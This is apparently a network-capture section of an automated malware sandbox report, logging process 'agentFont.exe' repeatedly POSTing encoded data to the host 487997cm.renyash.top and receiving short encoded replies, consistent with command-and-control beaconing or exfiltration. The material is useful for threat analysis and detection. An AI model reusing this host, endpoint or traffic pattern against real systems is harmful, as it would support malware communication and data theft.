                                                                                  Data Raw: 02 1a 27 5b 2a 36 3c 02 24 05 22 0f 33 00 3f 50 3c 23 04 1f 38 02 31 1f 31 3a 24 10 28 33 23 18 28 3b 2e 5e 3f 04 3f 05 31 0c 06 51 26 1f 2a 51 00 1c 23 5b 3c 15 23 58 3c 06 00 55 3d 31 28 06 28 5a 24 01 22 04 24 0d 24 05 22 57 33 13 2b 5d 3c 2f 2f 0c 2c 35 0a 02 2c 55 2c 00 27 0c 2f 52 09 14 22 05 2a 30 24 08 27 22 08 58 33 20 37 5d 35 01 23 55 34 32 25 1f 23 0d 23 58 3f 3d 15 59 21 32 3d 01 26 12 00 08 3c 3d 06 08 22 3e 23 54 2c 03 23 56 0f 36 5d 51
                                                                                  Data Ascii: '[*6<$"3?P<#811:$(3#(;.^??1Q&*Q#[<#X<U=1((Z$"$$"W3+]<//,5,U,'/R"*0$'"X3 7]5#U42%##X?=Y!2=&<=">#T,#V6]Q


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  120 | 192.168.2.4 | 50123 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:28:50.426479101 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:50.784240961 CET | 1044 | OUT | Data Raw: 54 50 5d 52 54 46 55 58 59 5f 5b 52 5a 5c 59 57 55 50 54 59 51 50 5b 5b 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TP]RTFUXY_[RZ\YWUPTYQP[[^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.Z("= =[1>5.,2Y!%<%50/!)59Y(*&X"#\.0
                                                                                  Jan 1, 2025 11:28:51.082334042 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:51.214059114 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:47 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  121 | 192.168.2.4 | 50124 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:28:51.331893921 CET | 302 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Jan 1, 2025 11:28:51.690491915 CET | 1044 | OUT | Data Raw: 54 5b 5d 52 54 4a 50 5d 59 5f 5b 52 5a 5d 59 54 55 52 54 5d 51 5c 5b 59 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: T[]RTJP]Y_[RZ]YTURT]Q\[Y^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW-)!>">'1-.,1<&^0,*Y#5P$Y2*/Z!*?&X"#\.
                                                                                  Jan 1, 2025 11:28:51.968322039 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:52.098198891 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:48 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  122 | 192.168.2.4 | 50125 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:28:52.223464966 CET | 302 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Jan 1, 2025 11:28:52.581047058 CET | 1044 | OUT | Data Raw: 51 55 58 5b 54 44 50 5c 59 5f 5b 52 5a 53 59 56 55 53 54 5d 51 58 5b 50 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QUX[TDP\Y_[RZSYVUST]QX[P^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.)264>+2>@,-+%-'%6&-%<!Q*7;_5>=+&X"#\.
                                                                                  Jan 1, 2025 11:28:52.869333982 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:52.999875069 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:49 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  123 | 192.168.2.4 | 50126 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:28:53.138638020 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:53.487217903 CET | 1044 | OUT | Data Raw: 54 5b 5d 52 54 4a 50 5a 59 5f 5b 52 5a 5c 59 50 55 57 54 5c 51 5b 5b 5b 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: T[]RTJPZY_[RZ\YPUWT\Q[[[^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW._(2)U 4[%-9:8$,!'.Z!"36>$'_6.&+*&X"#\.0
                                                                                  Jan 1, 2025 11:28:53.778939962 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:53.910923958 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:50 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  124 | 192.168.2.4 | 50127 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:28:54.046004057 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:54.393476963 CET | 1044 | OUT | Data Raw: 54 54 5d 5a 54 4a 55 51 59 5f 5b 52 5a 52 59 56 55 53 54 5e 51 5f 5b 5a 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TT]ZTJUQY_[RZRYVUST^Q_[Z^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.\+2S7-+1=9-2>X$,."5&0&)B0!%_+*&X"#\.
                                                                                  Jan 1, 2025 11:28:54.702841997 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:54.833950043 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:51 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  125 | 192.168.2.4 | 50128 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:28:54.960140944 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:55.315342903 CET | 1044 | OUT | Data Raw: 51 51 5d 5f 54 4b 50 5c 59 5f 5b 52 5a 5e 59 52 55 5e 54 5a 51 50 5b 5b 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QQ]_TKP\Y_[RZ^YRU^TZQP[[^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.?%S [;2.- 1/'/>!5V%,1Q*B365Y<&X"#\.8
                                                                                  Jan 1, 2025 11:28:55.597754002 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:55.726216078 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:52 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  126 | 192.168.2.4 | 50129 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:28:55.847875118 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1040
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  127 | 192.168.2.4 | 50130 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:28:56.118541956 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1324
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:56.471590042 CET | 1324 | OUT | Data Raw: 54 55 5d 5e 51 41 50 5d 59 5f 5b 52 5a 5a 59 53 55 53 54 5b 51 51 5b 59 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TU]^QAP]Y_[RZZYSUST[QQ[Y^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.+T"7&=-'V&/^$<9"%'/)$/[!==+*&X"#\.0
                                                                                  Jan 1, 2025 11:28:56.752249956 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:56.881484985 CET | 308 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:53 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 152
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 02 1a 27 5a 29 18 2c 00 30 02 32 0f 24 10 28 09 2b 0d 2a 5d 38 3c 32 05 26 3a 0d 02 28 23 20 0c 2b 3b 07 04 2b 2d 34 11 25 32 24 51 24 25 2a 51 00 1c 23 5a 3e 28 37 1c 3f 3b 29 08 2a 1f 34 07 2b 12 23 10 35 3a 23 1f 27 38 3a 57 25 2e 27 59 3f 01 28 1f 2d 25 2f 16 2c 0d 01 5a 24 0c 2f 52 09 14 21 12 2b 23 24 0f 31 31 2e 5e 30 56 38 03 22 28 30 09 34 32 0b 51 20 55 23 11 28 2d 2b 13 22 0f 2e 11 32 12 22 44 3c 03 2b 57 35 3e 23 54 2c 03 23 56 0f 36 5d 51
                                                                                  Data Ascii: 'Z),02$(+*]8<2&:(# +;+-4%2$Q$%*Q#Z>(7?;)*4+#5:#'8:W%.'Y?(-%/,Z$/R!+#$11.^0V8"(042Q U#(-+".2"D<+W5>#T,#V6]Q


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  128 | 192.168.2.4 | 50131 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:28:56.239485025 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:56.596666098 CET | 1044 | OUT | Data Raw: 51 51 5d 5b 54 47 55 5a 59 5f 5b 52 5a 53 59 54 55 57 54 50 51 5f 5b 5d 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QQ][TGUZY_[RZSYTUWTPQ_[]^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW-+!&4>$\$=59=%/&_3?6"5:3?>4"-:(&X"#\.
                                                                                  Jan 1, 2025 11:28:56.875875950 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:57.006108999 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:53 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  129 | 192.168.2.4 | 50132 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:28:57.129631042 CET | 302 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Jan 1, 2025 11:28:57.487349033 CET | 1044 | OUT | Data Raw: 51 55 5d 53 54 42 55 5d 59 5f 5b 52 5a 5d 59 54 55 5e 54 5b 51 5c 5b 50 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QU]STBU]Y_[RZ]YTU^T[Q\[P^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.](2!R4=X2[5-[+1?3<_6%)'<)=;5[9\?:&X"#\.
                                                                                  Jan 1, 2025 11:28:57.794356108 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:57.927877903 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:54 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  130 | 192.168.2.4 | 50133 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:28:58.051821947 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:58.409105062 CET | 1044 | OUT | Data Raw: 54 5a 58 5f 54 4a 50 59 59 5f 5b 52 5a 5e 59 56 55 5f 54 5c 51 51 5b 5a 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TZX_TJPYY_[RZ^YVU_T\QQ[Z^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.]+!%7.<&>B-[+T%?:',6!&1V0?.+7 !>>(&X"#\.8
                                                                                  Jan 1, 2025 11:28:58.691745996 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:58.822750092 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:55 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  131 | 192.168.2.4 | 50134 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:28:58.945703030 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:59.592786074 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:59.724345922 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:56 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  132 | 192.168.2.4 | 50135 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:28:59.856457949 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:29:00.521708965 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:29:00.659693003 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:57 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  133 | 192.168.2.4 | 50136 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:29:00.831130981 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1040
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:29:01.468264103 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:29:01.598206997 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:58 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  134 | 192.168.2.4 | 50137 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:29:01.734752893 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  135 | 192.168.2.4 | 50138 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:29:01.901880980 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
